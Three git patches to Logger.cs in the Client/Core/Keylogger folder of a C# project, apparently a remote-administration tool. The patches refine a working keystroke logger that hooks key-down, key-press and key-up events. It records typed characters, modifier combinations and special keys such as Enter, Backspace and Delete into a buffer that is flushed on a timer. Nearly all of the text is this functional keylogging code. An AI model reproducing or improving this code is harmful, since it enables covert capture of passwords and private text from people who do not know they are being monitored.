From 3ed53465bf5fc8f8ab8a14fee93f23e5bf56b119 Mon Sep 17 00:00:00 2001 From: d3agle Date: Thu, 21 May 2015 09:34:06 -0500 Subject: [PATCH 1/3] Changes to keylogger Made a few changes, added some comments for some considerations --- Client/Core/Keylogger/Logger.cs | 100 ++++++++++++++++++++------------ 1 file changed, 62 insertions(+), 38 deletions(-) diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index 6a6aa4d3..d592a15c 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -50,6 +50,8 @@ public Logger(double flushInterval) _timerFlush.Enabled = true; _timerFlush.Start(); + + Application.Run(); } ~Logger() @@ -127,63 +129,85 @@ private void Unsubscribe() m_Events.Dispose(); } - private void OnKeyDown(object sender, KeyEventArgs e) + private void OnKeyDown(object sender, KeyEventArgs e) //Called first { - PressedKeys.Add(e.KeyCode); + //Because we are processing two different event arguments between this method (OnKeyDown) and the Logger_KeyPress method, we need to choose which methods will process which keys. + //We need to indicate that this method will be used to process all keys that aren't translated to unicode characters. + if (!PressedKeys.Contains(e.KeyCode)) //prevent multiple keypresses holding down a key + PressedKeys.Add(e.KeyCode); } - private void OnKeyUp(object sender, KeyEventArgs e) + private void Logger_KeyPress(object sender, KeyPressEventArgs e) //Called second { - _logFileBuffer.Append(HighlightSpecialKeys(PressedKeys.ToArray())); - - PressedKeys.Remove(e.KeyCode); + //This method should be used to process all of our unicode characters + _logFileBuffer.Append(e.KeyChar); } - private void Logger_KeyPress(object sender, KeyPressEventArgs e) + private void OnKeyUp(object sender, KeyEventArgs e) //Called third { - _logFileBuffer.Append(e.KeyChar + " "); + _logFileBuffer.Append(AppendKeysToLog(PressedKeys.ToArray())); } - private string HighlightSpecialKeys(Keys[] _names) + private string AppendKeysToLog(Keys[] _names) { + if (_names.Length < 1) return string.Empty; + string[] names = new string[_names.Length]; - Array.Copy(_names, names, _names.Length); - - return HighlightSpecialKeys(names); - } - - private string HighlightSpecialKeys(string[] names) - { - if (names.Length < 1) return string.Empty; - - StringBuilder specialKeys = new StringBuilder(); - - int ValidSpecialKeys = 0; - for (int i = 0; i < names.Length; i++) + for (int i = 0; i < _names.Length; i++) { - if (!string.IsNullOrEmpty(names[i])) + names[i] = _names[i].ToString(); + } + + if (PressedKeys.Contains(Keys.LControlKey) + || PressedKeys.Contains(Keys.RControlKey) + || PressedKeys.Contains(Keys.LMenu) + || PressedKeys.Contains(Keys.RMenu)) + { + StringBuilder specialKeys = new StringBuilder(); + + int ValidSpecialKeys = 0; + for (int i = 0; i < names.Length; i++) { - if (ValidSpecialKeys == 0) + PressedKeys.Remove(_names[i]); + if (!string.IsNullOrEmpty(names[i])) { - specialKeys.AppendFormat("([{0}] ", names[i]); - } - else - { - specialKeys.AppendFormat("+ [{0}]", names[i]); - } + if (ValidSpecialKeys == 0) + { + specialKeys.AppendFormat("([{0}] ", names[i]); + } + else + { + specialKeys.AppendFormat("+ [{0}]", names[i]); + } - ValidSpecialKeys++; + ValidSpecialKeys++; + } } - } - // If there are items in the special keys string builder, give it an ending - // font tag and some trailing white-space. - if (ValidSpecialKeys > 0) + // If there are items in the special keys string builder, give it an ending + // font tag and some trailing white-space. + if (ValidSpecialKeys > 0) + { + specialKeys.Append(") "); + } + + return specialKeys.ToString(); + } + else { - specialKeys.Append(") "); - } + StringBuilder normalKeys = new StringBuilder(); - return specialKeys.ToString(); + for (int i = 0; i < names.Length; i++) + { + PressedKeys.Remove(_names[i]); + if (!string.IsNullOrEmpty(names[i])) + { + normalKeys.Append(names[i]); + } + } + + return normalKeys.ToString(); + } } private void timerFlush_Elapsed(object sender, System.Timers.ElapsedEventArgs e) From da63edc4c5b2916aa6db865f424b18e133746fc8 Mon Sep 17 00:00:00 2001 From: d3agle Date: Fri, 22 May 2015 00:53:09 -0500 Subject: [PATCH 2/3] Initial key handling logic --- Client/Core/Keylogger/Logger.cs | 50 +++++++++++++++++++++++++++++---- 1 file changed, 45 insertions(+), 5 deletions(-) diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index d592a15c..aaf0f006 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -131,10 +131,48 @@ private void Unsubscribe() private void OnKeyDown(object sender, KeyEventArgs e) //Called first { - //Because we are processing two different event arguments between this method (OnKeyDown) and the Logger_KeyPress method, we need to choose which methods will process which keys. - //We need to indicate that this method will be used to process all keys that aren't translated to unicode characters. - if (!PressedKeys.Contains(e.KeyCode)) //prevent multiple keypresses holding down a key - PressedKeys.Add(e.KeyCode); + if (PressedKeys.Contains(Keys.LControlKey) + || PressedKeys.Contains(Keys.RControlKey) + || PressedKeys.Contains(Keys.LMenu) + || PressedKeys.Contains(Keys.RMenu) + || PressedKeys.Contains(Keys.LWin) + || PressedKeys.Contains(Keys.RWin)) + { + if (!PressedKeys.Contains(e.KeyCode)) //prevent multiple keypresses holding down a key + PressedKeys.Add(e.KeyCode); + } + else if ((e.KeyCode >= Keys.A && e.KeyCode <= Keys.Z) + || (e.KeyCode >= Keys.NumPad0 && e.KeyCode <= Keys.Divide) + || (e.KeyCode >= Keys.D0 && e.KeyCode <= Keys.D9) + || (e.KeyCode >= Keys.Oem1 && e.KeyCode <= Keys.OemClear + || (e.KeyCode >= Keys.LShiftKey && e.KeyCode <= Keys.RShiftKey) + || (e.KeyCode == Keys.CapsLock))) + { + return; + } + else if (e.KeyCode == Keys.Enter) + { + _logFileBuffer.Append("(ENTER)
"); //this could be where the KeyloggerKeys enum would be handy + } + else if (e.KeyCode == Keys.Space) + { + _logFileBuffer.Append(" "); + } + else if (e.KeyCode == Keys.Back) + { + _logFileBuffer.Append("(BACK)"); + } + else if (e.KeyCode == Keys.Delete) + { + _logFileBuffer.Append("(DEL)"); + } + else if (e.KeyCode >= Keys.Left && e.KeyCode <= Keys.Down) + { + _logFileBuffer.Append("(" + e.KeyCode.ToString() + ")"); + } + else + if (!PressedKeys.Contains(e.KeyCode)) //prevent multiple keypresses holding down a key + PressedKeys.Add(e.KeyCode); } private void Logger_KeyPress(object sender, KeyPressEventArgs e) //Called second @@ -161,7 +199,9 @@ private string AppendKeysToLog(Keys[] _names) if (PressedKeys.Contains(Keys.LControlKey) || PressedKeys.Contains(Keys.RControlKey) || PressedKeys.Contains(Keys.LMenu) - || PressedKeys.Contains(Keys.RMenu)) + || PressedKeys.Contains(Keys.RMenu) + || PressedKeys.Contains(Keys.LWin) + || PressedKeys.Contains(Keys.RWin)) { StringBuilder specialKeys = new StringBuilder(); From df27608f7bf5e581aec81e7893f398f14c145b4f Mon Sep 17 00:00:00 2001 From: d3agle Date: Fri, 22 May 2015 09:15:33 -0500 Subject: [PATCH 3/3] Revert method name change added some more comments --- Client/Core/Keylogger/Logger.cs | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index aaf0f006..00f3a313 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -131,7 +131,7 @@ private void Unsubscribe() private void OnKeyDown(object sender, KeyEventArgs e) //Called first { - if (PressedKeys.Contains(Keys.LControlKey) + if (PressedKeys.Contains(Keys.LControlKey) //if modifier keys are still down, they will be highlighted, including any other key pressed || PressedKeys.Contains(Keys.RControlKey) || PressedKeys.Contains(Keys.LMenu) || PressedKeys.Contains(Keys.RMenu) @@ -141,7 +141,7 @@ private void Unsubscribe() if (!PressedKeys.Contains(e.KeyCode)) //prevent multiple keypresses holding down a key PressedKeys.Add(e.KeyCode); } - else if ((e.KeyCode >= Keys.A && e.KeyCode <= Keys.Z) + else if ((e.KeyCode >= Keys.A && e.KeyCode <= Keys.Z) //exclude keys here we don't want to log and return, KeyPress event can handle these if it is a character value || (e.KeyCode >= Keys.NumPad0 && e.KeyCode <= Keys.Divide) || (e.KeyCode >= Keys.D0 && e.KeyCode <= Keys.D9) || (e.KeyCode >= Keys.Oem1 && e.KeyCode <= Keys.OemClear @@ -183,10 +183,10 @@ private void Unsubscribe() private void OnKeyUp(object sender, KeyEventArgs e) //Called third { - _logFileBuffer.Append(AppendKeysToLog(PressedKeys.ToArray())); + _logFileBuffer.Append(HighlightSpecialKeys(PressedKeys.ToArray())); } - private string AppendKeysToLog(Keys[] _names) + private string HighlightSpecialKeys(Keys[] _names) { if (_names.Length < 1) return string.Empty;